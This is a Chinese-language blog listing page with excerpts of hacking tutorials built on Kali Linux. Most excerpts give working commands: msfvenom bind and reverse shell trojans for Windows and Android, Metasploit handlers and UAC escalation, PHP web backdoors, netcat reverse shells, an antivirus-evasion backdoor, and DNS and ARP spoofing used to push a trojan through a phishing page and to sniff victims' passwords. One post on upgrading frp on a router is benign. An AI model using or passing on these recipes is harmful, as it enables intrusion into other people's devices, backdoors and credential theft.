TypechoJoeTheme

青檬小栈

搜索到 29 篇与 LINUX 的结果
2020-02-16

KALI拿到shell后提权操作

KALI拿到shell后提权操作
利用KALI 进行程序提权操作UAC Exploit/windows/local/ask 模块提权介绍:使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC1.拿到session后将session放入后台2.执行 use exploit windows/local/ask 使用ask模块3.在ask模块中首先设置你的session会话的IDset session id4.ask模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限set filename QQ.exe5.其他的无需设置直接发起攻击exploit目标情况:如过对方选择"是" 那么会生成一个新的session对话 如果 对方选择“否”那么该攻击会在一段时间显示超时进入到新创建的会话中后我们再次执行getsystem命令进行提权UAC绕过来提权上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是"下面我们使用一种在对方不知不觉的情况下进行UAC绕过来进行权限的提升。模块:Exploit...
bystart
2020-02-16

LINUX

482 阅读
0 评论
2020年02月16日
482 阅读
0 评论
2020-01-14

Kali内网使用正向shell入侵

Kali内网使用正向shell入侵
利用KALI生成正向shell木马生成正向shell使用以下命令生成shell木马msfvenom -p windows/meterpreter/bind_tcp lport=9055 -f exe -o /root/桌面/正向shell.exe设置payloaduse exploit/multi/handler set payload windows/meterpreter/bind_tcp设置目标IP和监听端口set lport 9055 set rhost IP在目标机器运行木马后,在kali主机中执行run命令即可拿到shell
bystart
2020-01-14

LINUX

223 阅读
0 评论
2020年01月14日
223 阅读
0 评论
2019-12-06

PHP木马生成与利用

PHP木马生成与利用
工具Web Backdoor Cookie weevelyWeb Backdoor Cookieweb后门脚本工具包,通过HTTP在客户端和web服务器之间提供类似隐形终端连接。weevelyLinux版本的中国菜刀。Web Backdoor Cookie生成PHP木马webacoo -g -o hack.php建立连接webacoo -t -u http://目标域名/hack.php在这里我们与web服务器建立了webacoo终端执行命令时要在前面加上一个冒号(:)WeBaCoo后门的客户端和服务器端的通信是不易发现的加密会话weevely生成PHP木马weevely generate 密码 路径 文件名建立连接weevely http://目标域名/weevely.php 密码执行shell命令需要带上:冒号。基本命令::net_ifconfig //查看网卡 :net_scan ip 1-100 //扫描主机1-100所开放的端口等等。
bystart
2019-12-06

LINUX

180 阅读
1 评论
2019年12月06日
180 阅读
1 评论
2019-11-27

Linux NC命令

Linux NC命令
安装ncatyum install nmap-ncat -y //centos sudo apt-get -y install netcat-traditional //ubuntu监听入站连接服务器端开启入站监听nc -l 8080客户端连接服务端nc ip 8080连接上后可以互相通讯类似这样利用NC扫描端口利用nc扫描目标 1-100内的端口情况nc -z -v -n -w 2 ip 1-100如图利用nc发送文件发送端执行nc -v -l 8080 < out.txt //文件名接收方执行nc -v -n ip 8080 > in.txt //收过来的时候以这个文件名保存如图发送整个文件夹发送端执行tar -cvPf - ~/out | nc -l 8080客户端执行nc -n IP 8080 | tar -xvPf -如图利用nc正向shell连接目标机执行nc -lvvp 8080 -e /bin/bash控制端执行nc IP 8080效果如下在控制端输入的命令都会在目标机器上执行反向shell链接目标机器执行nc -e /bin/bash 控制端的IP ...
bystart
2019-11-27

LINUX

143 阅读
0 评论
2019年11月27日
143 阅读
0 评论
2019-11-26

Kali利用Android木马渗透手机(高级篇)

Kali利用Android木马渗透手机(高级篇)
利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马前言内网渗透,非公网IP上线。不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏互联网非法外之地,还请各位兄弟谨记,且行且珍惜。第一步生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk第二步制作钓鱼网页在这里我已经简单的准备了一个页面代码如下将生成的木马和编写页面放置到/var/www/html/目录下然后启动Apache2systemctl start apache2第三步开启DNS劫持*编辑ettercap的DNS文件nano /etc/ettercap/etter.dns*启动ettercapettercap -G*操作步骤在弹出的窗口选择自己的网卡然后扫描内网IP选择网关 add to target 1选择目标 add to target 2点击图中的菜单在之后弹出的选项中选择第一个然后确定然后我们开启攻击开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作手机端状态此时我...
bystart
2019-11-26

LINUX

662 阅读
2 评论
2019年11月26日
662 阅读
2 评论
2019-11-17

Kali制作win后门木马免杀

Kali制作win后门木马免杀
安装powerstager此工具需要python3的支持apt-get install python3 apt-get install mingw-w64项目地址https://github.com/z0noxz/powerstager git clone https://github.com/z0noxz/powerstager cd powerstager sudo ./setup.py install制作免杀python3 powerstager.py -m -t win64 --lhost=10.0.2.15 --lport=9055 -o /root/test.exe会在root目录下生成一个test.exe后门程序lhost填写kali上线IPlport上线端口利用msfconsole监听木马use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 10.0.2.15 set lport 9055 exploit运行木马获取shell运行木马获取回话火绒查杀
bystart
2019-11-17

LINUX

471 阅读
0 评论
2019年11月17日
471 阅读
0 评论
2019-11-14

小米路由器升级frp版本

小米路由器升级frp版本
小米路由器3老毛子固件升级frp版本第一步首先去 http://down.xxorg.com/下载你要的frp版本点击进去后只需要下载frpc就可以了第二步修改脚本下载完成之后 进入 cd /etc/storage/script/中修改 Sh32_frp.sh脚本文件找到 下面一段内容图中原本是 [ "$frp_version" = "1" ] && frp_ver_wget="0.16.1" ; then 改成你的自己的版本号[ "$frp_version" = "1" ] && frp_ver_wget="0.22.0" ; then 上传frpc修改完成之后进入下面两个目录分别把frpc上传进去cd /opt/bin/ cd /tmp/AiDisk_00/opt/bin/ #并且全部赋予 755权限 chmod 755 frpc到此就修改升级完成了。
bystart
2019-11-14

LINUX

392 阅读
1 评论
2019年11月14日
392 阅读
1 评论
2019-11-12

Kali 进行DNS欺骗

Kali 进行DNS欺骗
准备KALI IP:192.168.124.14 Windows10 IP:192.168.124.17编辑ettercap的DNS文件文件在:/etc/ettercap/etter.dns添加一条新纪录*范匹配 匹配所有域名转发到kali身上添加页面Kali自带Apache,我们只需要将我们准备好的黑页放到/var/www/html/放置好页面之后我们启动Apache/etc/init.d/apache2 start启动ettercap当Apache开始工作后启动ettercapettercap -G选择网卡 Unfied sniffing扫描目标扫描完成后展示列表从图中可以看到我们的win10目标机已出现我们将网关点击 Add to target 1将目标点击至 Add to target 2最后配置我们在弹出的选项中选择第一个然后在plugins>mangge the plugins中配置插件在这一步需要双击插件才能被启用发起攻击我们选择Start -> Start sniffing受害者页面无论受害者访问任何网页都将是这个样子注:如果使用上面的方法无法进行D...
bystart
2019-11-12

LINUX

163 阅读
0 评论
2019年11月12日
163 阅读
0 评论
2019-11-12

Kali ARP欺骗

Kali ARP欺骗
Kali系统获取局域网内图片和账号密码嗅探及断网攻击arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。Kali主机采用虚拟机 桥接模式受害者主机 windows系列目标准备攻击者ip:192.168.1.3受害者ip:192.168.1.2网关IP:192.168.1.1查看网卡口#ip a查看192.168.1.3的网卡名,我这台主机叫eth0开启端口转发echo 1 >/proc/sys/net/ipv4/ip_forward开始进行arp攻击arpspoof -t 192.168.1.2 192.168.1.1 -i eth0此时kali可拦截相关受害者主机相关信息,开启wireshark拦截受害者ping数据利用driftnet 窃取受害者网络中传输的图片,图片以小窗口的形式显示driftnet -i eth0进行账号密码嗅探ettercap -Tq -i eth0开启转发与未开启效果开启转发功能目标能正常访问互联网未开启转...
bystart
2019-11-12

LINUX

189 阅读
1 评论
2019年11月12日
189 阅读
1 评论